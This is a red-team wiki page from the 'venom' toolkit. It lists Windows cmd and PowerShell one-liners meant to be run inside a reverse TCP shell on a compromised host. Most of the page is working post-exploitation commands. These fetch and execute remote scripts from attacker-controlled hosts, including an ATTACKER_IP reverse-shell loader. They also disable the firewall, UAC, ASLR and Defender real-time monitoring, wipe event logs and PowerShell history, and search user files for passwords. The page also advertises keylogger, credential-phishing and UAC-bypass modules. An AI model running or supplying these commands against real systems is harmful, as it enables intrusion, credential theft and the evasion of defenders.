CmdLine & Scripts for reverse TCP shell addicts

Description

This WIKI describes some of the available cmdline(s) & Scripts that can be executed directly in our reverse tcp shell prompt
to help pentesters (red teams) in there enumeration tasks or to perform simple remote host shell functions ( onelinners ).
Venom v1.0.17.7 release replaced the xterm terminal by gnome-terminal because xterm does not allow users to copy/paste.

Wiki Jump Links

[1] - Enumeration
[2] - NetWork
[3] - FileSystem
[4] - Credentials
[5] - Auxiliary-Modules

Enumeration

Description	Privileges	Interpreter	LolBin
target host enumeration	🚶 UserLand	cmd or powershell	systeminfo

systeminfo|findstr "Host OS Type"

Description	Privileges	Interpreter
Get current username	🚶 UserLand	powershell

$Env:USERNAME|whoami

Description	Privileges	Interpreter
List Host Accounts	🚶 UserLand	powershell

Get-LocalUser|Select-Object Name,Enabled,Description

Description	Privileges	Interpreter
List last logon	🚶 UserLand	powershell

Get-LocalUser|ft Name,Enabled,LastLogon

Description	Privileges	Interpreter
Get current process PID	🚶 UserLand	powershell

$pid

Description	Privileges	Interpreter
Get current process PID	🚶 UserLand	powershell

(Get-Process -PID $PID).Id

Description	Privileges	Interpreter	Storage
Capture desktop screenshot and save to TMP (FileLess)	🚶 UserLand	powershell	FileLess + $Env:TMP (screenshots)

iex(iwr("https://pastebin.com/raw/L8BVTDV6"))

Description	Privileges	Interpreter	LolBin	Storage
Capture screenshots of mouseclicks for 4 seconds	🚶 UserLand	powershell	psr.exe	$Env:TMP (SHot.zip)

psr.exe /start /output $Env:TMP\SHot.zip /sc 1 /gui 0;Start-Sleep -Seconds 4;psr.exe /stop

Description	Privileges	Interpreter
List Host Schedule Tasks	🚶 UserLand	cmd or powershell

cmd /c schtasks|findstr "Ready Running"

Description	Privileges	Interpreter
List Host Process(s) Running	🚶 UserLand	powershell

Get-Process|Select-Object Name,Path,Company,Product,StartTime

Description	Privileges	Interpreter
List Host Process(s) Running	🚶 UserLand	cmd or powershell

cmd /c tasklist /SVC

Description	Privileges	Interpreter
List Host Process(s) Running with CanStop True	🚶 UserLand	powershell

Get-Service|Select-Object CanStop,Status,Name,DisplayName|Where { $_.Status -iMatch 'Running' -and $_.CanStop -ieq 'True' }

Description	Privileges	Interpreter
List Host Process(s) Running with StartType automatic	🚶 UserLand	powershell

Get-Service|Select-Object Status,StartType,Name,DisplayName|Where { $_.Status -iMatch 'Running' -and $_.StartType -iMatch 'automatic' }

Description	Privileges	Interpreter
Stop remote process(s) by FileName	🚶 UserLand	cmd or powershell

cmd /c Taskkill /F /IM Python.exe

Description	Privileges	Interpreter
Stop remote process(s) by PID Number	🚶 UserLand	cmd or powershell

cmd /c Taskkill /F /PID 1234

Description	Privileges	Interpreter
List Host Applications Installed.	🚶 UserLand	powershell

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |Select-Object DisplayName, DisplayVersion|Format-Table -AutoSize

Description	Privileges	Interpreter
List Powershell History	🚶 UserLand	powershell

type $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Description	Privileges	Interpreter
Anti-Virus Enumeration	🚶 UserLand	powershell

Get-MpComputerStatus

Description	Privileges	Interpreter
Enumerate protections	🚶 UserLand	powershell

MpPreference

[^] - Jump to Top

NetWork

Description	Privileges	Interpreter
List established connections	🚶 UserLand	cmd or powershell

cmd /c netstat -ano|findstr "ESTABLISHED"

Description	Privileges	Interpreter
List established connections	🚶 UserLand	powershell

Get-NetTcpConnection -State "Established"|Format-Table -AutoSize

Description	Privileges	Interpreter	LolBin
Start firefox browser in sellected url	🚶 UserLand	cmd or powershell	firefox.exe

cmd /c start firefox.exe https://www.bing.com/search?q=hacking

Description	Privileges	Interpreter	LolBin
Start webserver in current directory	🚶 UserLand	cmd or powershell	python.exe

python -m http.server --bind 192.168.1.72 8080

Description	Privileges	Interpreter	Storage
Download cmdlet to target machine and exec (FileLess)	🚶 UserLand	powershell	FileLess

iex(iwr("http://192.168.1.72/webserver.ps1"))

Description	Privileges	Interpreter	Storage
Download cmdlet to target machine	🚶 UserLand	powershell	$Env:TMP

iwr -Uri http://192.168.1.72/webserver.ps1 -OutFile $env:tmp\webserver.ps1

Description	Privileges	Interpreter	LolBin	Storage
Download cmdlet to target machine and exec (FileLess)	🚶 UserLand	powershell	Msxml2.XMLHTTP	FileLess

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText

Description	Privileges	Interpreter
List target host Interfaces	🚶 UserLand	powershell

Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address

Description	Privileges	Interpreter	LolBin
Fetch HTML headers	🚶 UserLand	cmd or powershell	curl.exe

cmd /c curl --head "https://example.com"

Description	Privileges	Interpreter	LolBin
List contents of remote directory	🚶 UserLand	cmd or powershell	curl.exe

cmd /c curl --list-only "https://example.com/foo/"

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	cmd or powershell

cmd /c ipconfig /displaydns|findstr /C:"Record Name" /C:"A (Host) Record"

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	Wmi + powershell

Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop|Select-Object Entry,Name,Data|Format-Table -Wrap|Out-String

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	powershell

Get-DNSClientCache|Select-Object Entry,Data|Format-Table -AutoSize

Description	Privileges	Interpreter	LolBin
List firewall rules	🚶 UserLand	cmd or powershell	netsh.exe

cmd /c netsh advfirewall show allprofiles

Description	Privileges	Interpreter	LolBin
List firewall rules	🚶 UserLand	cmd or powershell	netsh.exe

cmd /c netsh advfirewall show currentprofile

Description	Privileges	Interpreter	LolBin
List firewall rules	🚶 UserLand	powershell	null

Get-NetFirewallRule -All

Description	Privileges	Interpreter	LolBin
Filter firewall ruleName	🚶 UserLand	powershell	null

Get-NetFirewallRule|Where { $_.DisplayName -eq 'python.exe' }|Select-Object DisplayName,Description,Enabled,Profile,Direction,Action|Format-Table -AutoSize

Description	Privileges	Interpreter
List SMB shares	🚶 UserLand	powershell

Get-SmbShare|Select-Object Name,Path,Description

Description	Privileges	Interpreter
Get browser User Agent	🚶 UserLand	powershell

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\internet settings" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'

Description	Privileges	Interpreter	LolBin
Stop remote firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall set allprofiles state off

Description	Privileges	Interpreter	LolBin
Start remote firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall set allprofiles state on

Description	Privileges	Interpreter	LolBin
Add Rule to firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall firewall add rule name="Mine Webserver" dir=in action=allow protocol=TCP localport=8080

Description	Privileges	Interpreter	LolBin
Add Rule to firewall	🔑 Administrator	cmd or powershell	netsh.exe

netsh advfirewall firewall add rule name="Mine Webserver" description="venom v1.0.17 - python (SE) webserver" program="$Env:LOCALAPPDATA\Programs\python.exe" dir=in action=allow protocol=TCP enable=yes

Description	Privileges	Interpreter	LolBin
Delete Rule from firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall firewall delete rule name="Mine Webserver"

Description	Privileges	Interpreter
Delete Rule from firewall	🔑 Administrator	powershell

Remove-NetFirewallRule -DisplayName "Mine Webserver"

Description	Privileges	Interpreter	LolBin
Review firewall rule (Name)	🔑 Administrator	cmd or powershell	netsh.exe

netsh advfirewall firewall show rule name="Mine Webserver"

[^] - Jump to Top

FileSystem

Description	Privileges	Interpreter
Print Working Directory	🚶 UserLand	cmd or powershell

pwd

Description	Privileges	Interpreter
Hidde file with 'system' attribute	🚶 UserLand	cmd or powershell

cmd /c attrib +H +S C:\path\to\your\file.doc

Description	Privileges	Interpreter
Un-Hidde file with 'system' attribute	🚶 UserLand	cmd or powershell

cmd /c attrib -H -S C:\path\to\your\file.doc

Description	Privileges	Interpreter
List hidden files recursive	🚶 UserLand	cmd or powershell

cmd /c dir %USERPROFILE% /A:H /S /B

Description	Privileges	Interpreter
List ADS (Alternate Data Streams) entrys	🚶 UserLand	cmd or powershell

cmd /c dir /r

Description	Privileges	Interpreter
List all event logs	🚶 UserLand	powershell

Get-EventLog -List

Description	Privileges	Interpreter
Read FileName.txt text file on terminal (PS)	🚶 UserLand	powershell

Get-Content FileName.tx

Description	Privileges	Interpreter
Read FileName.txt text file on terminal (PS)	🚶 UserLand	cmd or powershell

cmd /c type FileName.txt

Description	Privileges	Interpreter
List startup entrys	🚶 UserLand	powershell

Get-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User

Description	Privileges	Interpreter
List last 10 system eventlogs	🚶 UserLand	powershell

Get-EventLog -LogName "System" -newest 10

Description	Privileges	Interpreter
List last 10 security eventlogs	🔑 Administrator	powershell

Get-EventLog -LogName "Security" -newest 10

Description	Privileges	Interpreter
List last 10 Powershell eventlogs	🚶 UserLand	powershell

Get-EventLog -LogName "Windows Powershell" -newest 10

Description	Privileges	Interpreter
List Installed Software	🚶 UserLand	powershell

Get-ChildItem "C:\Program Files", "C:\Program Files (x86)"|ft Parent,Name,LastWriteTime

Description	Privileges	Interpreter
Shutdown remote pc in 10 seconds	🚶 UserLand	cmd or powershell

cmd /R shutdown /r /c "my shutdown msg" /t 10

Description	Privileges	Interpreter
List Recycle Bin entrys	🚶 UserLand	powershell

$shell = New-Object -com shell.application;$rb = $shell.Namespace(10);$rb.Items()

Description	Privileges	Interpreter
List Host Drives Available	🚶 UserLand	powershell

Get-PSDrive -PSProvider 'FileSystem'|Select-Object Name,Used,Free,Root|Format-Table

Description	Privileges	Interpreter
Hidde Drives from explorer	🔑 Administrator	cmd or powershell

cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Show Drives on explorer	🔑 Administrator	powershell

Remove-Itemproperty -path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\Explorer' -Name 'NoDrives' -Force;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Clear windows event logs	🔑 Administrator	powershell

wevtutil el|Foreach-Object {wevtutil cl "$_"}

Description	Privileges	Interpreter
Disable remote UAC	🔑 Administrator	powershell

Set-Itemproperty -path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system' -Name 'EnableLUA' -value 0 -Force

Description	Privileges	Interpreter
Disable remote ASLR	🔑 Administrator	powershell

Set-Itemproperty -path 'HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' -Name 'MoveImages' -value 0 -Force

Description	Privileges	Interpreter
Disable Task Manager	🔑 Administrator	cmd or powershell

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Enable Task Manager	🔑 Administrator	cmd or powershell

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 0 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

[^] - Jump to Top

Credentials

Description	Privileges	Interpreter
List User Tokens	🚶 UserLand	cmd or powershell

whoami /priv

Description	Privileges	Interpreter
List stored credentials	🚶 UserLand	cmd or powershell

cmdkey /list

Description	Privileges	Interpreter
Verify If You Are in Constrained Mode	🚶 UserLand	powershell

$ExecutionContext.SessionState.LanguageMode

Description	Privileges	Interpreter
List Host Groups Available (SID)	🚶 UserLand	powershell

Get-LocalUser|Select-Object -Property Name,SID,Enabled,PasswordRequired,LastLogon|ft

Description	Privileges	Interpreter	LolBin	Author
Find missing software patchs for Privilege Escalation	🚶 UserLand	powershell	iwr	@rasta-mouse

(Find-AllVulns(iwr https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/sherlock.ps1))

Description	Privileges	Interpreter
List Host Folder Permissions	🚶 UserLand	powershell

Get-Acl $Env:PROGRAMFILES

Description	Privileges	Interpreter
List Host Folder Permissions	🚶 UserLand	cmd

icacls "%PROGRAMFILES%"

Description	Privileges	Interpreter
List folders with 'Everyone' Permissions	🚶 UserLand	powershell

Get-ChildItem "C:\Program Files*", "C:\Program Files (x86)*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}}

Description	Privileges	Interpreter
List Host Unquoted Service Paths.	🚶 UserLand	powershell

gwmi -class Win32_Service -Property Name,DisplayName,PathName,StartMode|Where {$_.StartMode -eq "Auto" -and $_.PathName -NotLike "C:\Windows\*" -and $_.PathName -NotMatch '"*"'}|Select PathName,Name

Description	Privileges	Interpreter
List Folder(s) Weak Permissions Recursive.	🚶 UserLand	cmd + powershell

icacls $env:programfiles\* > $env:tmp\WeakDirs.txt;$check_ACL = get-content $env:tmp\WeakDirs.txt|findstr /I /C:"Everyone:"|findstr "(F) (R) (W)";If($check_ACL){Get-Content $env:tmp\WeakDirs.txt;remove-item $env:tmp\WeakDirs.txt -Force}

Description	Privileges	Interpreter
Search for Rotten Potato Vulnerability.	🚶 UserLand	cmd + powershell

cmd /R whoami /priv|findstr /i /C:"SeImpersonatePrivilege" /C:"SeAssignPrimaryPrivilege" /C:"SeTcbPrivilege" /C:"SeBackupPrivilege" /C:"SeRestorePrivilege" /C:"SeCreateTokenPrivilege" /C:"SeLoadDriverPrivilege" /C:"SeTakeOwnershipPrivilege" /C:"SeDebugPrivileges" > dellog.txt;$check_ACL = get-content dellog.txt|findstr /i /C:"Enabled";If($check_ACL){echo "[i] Rotten Potato Vulnerable Settings Found [Enabled] ..`n" > test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Get-Content dellog.txt;remove-item dellog.txt -Force}Else{echo "[i] Rotten Potato not found in current system .."}

Description	Privileges	Interpreter
Check reverse tcp shell privileges	🚶 UserLand	powershell

$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");If($IsClientAdmin){echo "[i] Running under Administrator Privileges .."}Else{write-host "[i] Running under UserLand Privileges .."}

Description	Privileges	Interpreter
Search for paswords inside text (txt) or log (log) files recursive	🚶 UserLand	cmd + powershell

cd $Env:USERPROFILE|findstr /s /I "passw" *.txt *.log >> $Env:TMP\passwd.txt;cd $Env:USERPROFILE|findstr /s /I "login" *.txt *.log >> $Env:TMP\passwd.txt;Get-Content $Env:TMP\passwd.txt;Remove-Item $Env:TMP\passwd.txt -Force

Description	Privileges	Interpreter
Powershell Constrained Language Bypass	🚶 UserLand	powershell

powershell -v 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"

Description	Privileges	Interpreter
Disable AV Real time Monitoring	🚶 UserLand	powershell

Set-MpPreference -DisableRealtimeMonitoring $True; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

Description	Privileges	Interpreter
Disable PowerShell command logging for current session (open shell)	🚶 UserLand	powershell

Set-PSReadlineOption –HistorySaveStyle SaveNothing

Description	Privileges	Interpreter
List Powershell Options	🚶 UserLand	powershell

Get-PSReadlineOption

Description	Privileges	Interpreter
Clear PowerShell command logging	🚶 UserLand	powershell

$CleanTracks = (Get-PSReadlineOption).HistorySavePath;echo "null" > $CleanTracks

Description	Privileges	Interpreter
List execution policy	🚶 UserLand	powerhell

Get-ExecutionPolicy -List

Description	Privileges	Interpreter
Change execution policy for this session	🚶 UserLand	powershell

Set-ExecutionPolicy Bypass -Scope Process

Description	Privileges	Interpreter
Change execution policy (sillent)	🚶 UserLand	cmd or powerhell

cmd /R echo Y | powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

Description	Privileges	Interpreter	LolBin
List security updates installed	🚶 UserLand	cmd or powerhell	Wmic

wmic qfe get Hotfixid,installedon,description,installedby

Description	Operative system
World Writable Folders	Default on Windows 10 1803

C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

[^] - Jump to Top

Auxiliary-Modules

Module	Description
GetBrowsers.ps1	Enumerate remote host browsers (Home Page, All Browsers Versions, Accepted Language Download Directory, History, Bookmarks, Extentions, Start Page, Stored Creds, User-Agent, logins stored.)
CredsPhish.ps1	Standalone Powershell script that will promp the current user for a valid credential.
CompDefault.ps1	UAC bypass module or to execute one command with high privileges (Admin)
keylooger.ps1	Standalone Powershell Script to Capture keyboard keystrokes
webserver.ps1	CmdLet to download files from compromissed PC

[^] - Jump to Top

SSA RedTeam @2020